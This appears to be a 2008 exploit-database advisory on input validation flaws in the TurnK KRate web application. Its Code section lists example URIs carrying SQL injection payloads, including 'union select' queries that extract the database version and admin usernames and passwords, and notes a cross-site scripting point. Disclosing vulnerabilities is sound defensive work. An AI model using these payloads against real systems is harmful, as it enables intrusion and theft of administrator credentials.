exploits , vulnerabilities , articles , K-Rate Multiple Input Validation Vulnerabilities

Title	K-Rate Multiple Input Validation Vulnerabilities
Published	2008-08-26-12:00AM
Updated	2008-08-29-04:14PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	Corwin
Vulnerable	TurnK KRate 0
Not Vulnerable
Code	An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice a victim user to follow a malicious URI.The following example URIs are available:http://www.example.com/index.php?req=online&show=1[SQL] http://www.example.com/room/1[SQL] http://www.example.com/index.php?req=view&user=somegirl&id=2[SQL]&act=vote&image=3&voter=12 vote=3 http://www.example.com/index.php?req=view&user=somegirl&id=2&act=vote&image=3[SQL]&voter=12&vote=3 http://www.example.com/blog/somegirl[SQL] http://www.example.com/index.php?req=blog_edit&id=1[SQL] http://www.example.com/index.php?req=blog_edit&id=-1 union select 1,2,version(),4,5,6/* http://www.example.com/room/-1 union select 1,version(),3,4/* http://www.example.com/index.php?req=blog_edit&id=-1 union select 1,2,adm_user,4,5,6 from rate_admins where adm_id=1/* http://www.example.com/index.php?req=blog_edit&id=-1 union select 1,2,adm_pass,4,5,6 from rate_admins where adm_id=1/* http://www.example.com/index.php?req=view&user=somegirl&id=2&act=vote&image=3&voter=12&vote=3[XSS]
TXT